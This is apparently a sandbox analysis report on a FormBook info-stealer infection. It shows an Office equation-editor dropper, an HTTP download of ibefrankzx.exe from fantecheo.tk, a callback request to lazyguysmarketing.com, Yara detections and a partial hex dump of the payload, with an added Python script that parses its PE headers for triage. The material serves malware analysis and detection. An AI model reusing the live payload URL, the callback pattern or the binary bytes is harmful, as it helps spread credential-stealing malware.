2b 00 00 0a 06 7b 2b 00 00 0a 6f 2d 00 00 0a 2b 01 16 2a d2 20 b6 70 69 7c 20 29 55 55 a5 5a 28 25 00 00 0a 02
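The 200 OK above carries the first bytes of ibefrankzx.exe, which is enough to read the PE headers without the file itself. The Python below is added here as a triage example and is not part of the report or of Joe Sandbox. It transcribes the first 0x228 bytes of that Data Raw dump and parses them: a 32-bit PE with three sections, a CLR header (so a .NET assembly, which fits the .NET signatures in the list above), and a section table that accounts exactly for the served Content-Length. Where the transcription stops is my choice; every value the code reports is read from the bytes.

```python
"""Parse the PE headers out of the hex dump that the report prints for the
HTTP 200 response above (the ibefrankzx.exe download from fantecheo.tk).

Added triage example, not Joe Sandbox code. Only the first 0x228 bytes of
that Data Raw dump are reproduced: DOS header, NT headers, section table,
the IAT slot and the CLR header at the start of .text. CONTENT_LENGTH is
the server's Content-Length from the same response."""
import struct

PE_DUMP_HEX = """
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00
0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f
74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
50 45 00 00 4c 01 03 00 ae 13 51 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 94 0b 00
00 98 01 00 00 00 00 00 66 b3 0b 00 00 20 00 00 00 c0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00
04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0d 00 00 02 00 00 00 00 00 00 02 00 40 85
00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00
14 b3 0b 00 4f 00 00 00 00 c0 0b 00 54 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 60 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00
00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00
6c 93 0b 00 00 20 00 00 00 94 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60
2e 72 73 72 63 00 00 00 54 94 01 00 00 c0 0b 00 00 96 01 00 00 96 0b 00 00 00 00 00 00 00 00 00
00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0d 00 00 02 00 00 00 2c 0d 00
00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
48 b3 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 cc 01 00 14 53 02 00 03 00 00 00 8c 02 00 06
fc 1f 04 00 18 93 07 00
"""
PE_DUMP = bytes.fromhex(PE_DUMP_HEX)
CONTENT_LENGTH = 863744

DIRECTORY_NAMES = {1: "import", 2: "resource", 5: "basereloc", 12: "iat", 14: "clr"}
COR20_ILONLY = 0x1


def rva_to_offset(rva, sections):
    """Map an RVA to a file offset through the section table."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return rva - s["va"] + s["raw_ptr"]
    return None


def parse_pe(data):
    """Return a dict of header fields; `data` may be just a file prefix."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsect, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("this example handles PE32 only")
    # Fixed field offsets inside the PE32 optional header.
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = {}
    for i in range(min(ndirs, 16)):
        rva, size = struct.unpack_from("<II", data, opt + 96 + 8 * i)
        if i in DIRECTORY_NAMES and size:
            dirs[DIRECTORY_NAMES[i]] = (rva, size)
    sections = []
    for i in range(nsect):
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": f[0].rstrip(b"\0").decode("ascii"), "vsize": f[1],
                         "va": f[2], "raw_size": f[3], "raw_ptr": f[4], "chars": f[9]})
    info = {
        "machine": machine, "num_sections": nsect, "characteristics": chars,
        # For deterministic .NET builds this field is a content hash, not a time.
        "timestamp": stamp, "entry_point": entry, "image_base": image_base,
        "subsystem": subsystem, "dll_characteristics": dll_chars,
        "directories": dirs, "sections": sections, "is_dotnet": "clr" in dirs,
        # Size the section table accounts for; compare with what was served.
        "expected_size": max(s["raw_ptr"] + s["raw_size"] for s in sections),
    }
    off = rva_to_offset(dirs["clr"][0], sections) if "clr" in dirs else None
    if off is not None and off + 32 <= len(data):
        _cb, major, minor, md_rva, md_size, flags, token, res_rva, res_size = \
            struct.unpack_from("<IHHIIIIII", data, off)
        info["clr"] = {"runtime": f"{major}.{minor}", "metadata": (md_rva, md_size),
                       "flags": flags, "il_only": bool(flags & COR20_ILONLY),
                       "entry_point_token": token, "resources": (res_rva, res_size)}
    return info


def triage(info):
    """One-line findings a responder would pull out of the headers."""
    out = [f"PE32 machine=0x{info['machine']:04x} sections="
           + ",".join(s["name"] for s in info["sections"])]
    if info["is_dotnet"]:
        clr = info["clr"]
        out.append(f".NET assembly, CLR {clr['runtime']}, IL-only={clr['il_only']}, "
                   f"managed resources {clr['resources'][1]} bytes")
    if info["expected_size"] == CONTENT_LENGTH:
        out.append(f"section table matches Content-Length {CONTENT_LENGTH}: no overlay")
    else:
        out.append(f"sections end at {info['expected_size']}, served {CONTENT_LENGTH}: overlay or truncation")
    return out


if __name__ == "__main__":
    for line in triage(parse_pe(PE_DUMP)):
        print(line)
```

Two cross-checks fall out of this. The nginx ETag in the same response, "615120ec-d2e00", carries the body size in hex as its second field, and 0xd2e00 is 863744, the number the section table also yields, so nothing was appended after .reloc. The managed-resource blob is 0x79318 bytes of an 863744-byte file, which is where the "very large strings" and "potential unpacker" signatures above would be looking.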
Source: global traffic | HTTP traffic detected: GET /ibefrankzx.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: fantecheo.tk | Connection: Keep-Alive
Source: explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmp | String found in binary or memory: Http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 00000006.00000000.427412095.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.424935061.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.424935061.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.434104631.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.436720944.0000000003E50000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.424935061.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.418800523.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.427412095.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.427412095.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.424935061.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.434104631.0000000001BE0000.00000002.00020000.sdmp, wininit.exe, 00000007.00000002.668831534.0000000001F00000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.427412095.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.424935061.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.427412095.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehp=0
Source: explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehpLh-
Source: explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.418800523.00000000045D6000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.418800523.00000000045D6000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: ibefrankhq4862.exe, ibefrankhq4862.exe, 00000005.00000002.449302089.00000000013A2000.00000020.00020000.sdmp, wininit.exe, 00000007.00000002.668531899.00000000002B0000.00000004.00000001.sdmp | String found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
Source: explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.492146934.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.425752523.0000000003D90000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 00000006.00000000.418800523.00000000045D6000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
Source: explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D3778CDA-961A-4F4E-A09E-6641E3AF482B}.tmp
Source: unknown | DNS traffic detected: queries for: fantecheo.tk
Source: global traffic | HTTP traffic detected: GET /ibefrankzx.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: fantecheo.tk | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /if60/?L0Gd9F=rhh0xc6OYmH3Bp2G4X501Z0vOdzBEjh/MlQjf2DAfTSCIAGZoC8T5uMa8yxQ1kiGUtDxZg==&fDKt=ndxXaN5XDzkTz HTTP/1.1 | Host: www.lazyguysmarketing.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 5.2.ibefrankhq4862.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 5.2.ibefrankhq4862.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.ibefrankhq4862.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankzx[1].exe
          .NET source code contains very large strings
          Source: ibefrankzx[1].exe.2.dr, Darwin.WindowsForm/SearchResults.cs | Long String: Length: 34816
          Source: ibefrankhq4862.exe.2.dr, Darwin.WindowsForm/SearchResults.cs | Long String: Length: 34816
          Source: 4.0.ibefrankhq4862.exe.13a0000.0.unpack, Darwin.WindowsForm/SearchResults.cs | Long String: Length: 34816
          Source: 4.2.ibefrankhq4862.exe.13a0000.2.unpack, Darwin.WindowsForm/SearchResults.cs | Long String: Length: 34816
          Source: 5.0.ibefrankhq4862.exe.13a0000.0.unpack, Darwin.WindowsForm/SearchResults.cs | Long String: Length: 34816
          Source: 5.2.ibefrankhq4862.exe.13a0000.5.unpack, Darwin.WindowsForm/SearchResults.cs | Long String: Length: 34816
          Source: 5.2.ibefrankhq4862.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.ibefrankhq4862.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 4_2_002869C9
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 4_2_00286D30
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 4_2_002890A8
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 4_2_00A46998
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 4_2_00A4936F
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 4_2_00A401F9
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 4_2_00A45DC8
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 4_2_00A45DD8
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 4_2_002800F0
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_00401030
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0041D963
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_00402D8B
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_00402D90
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0041E5B0
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_00409E4B
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_00409E50
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0041EE3B
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0041EF5C
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0086E0C6
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0089D005
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_00873040
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0088905A
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0086E2E9
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_00911238
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0086F3CF
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_008963DB
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_00872305
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_00877353
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_008BA37B
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_00881489
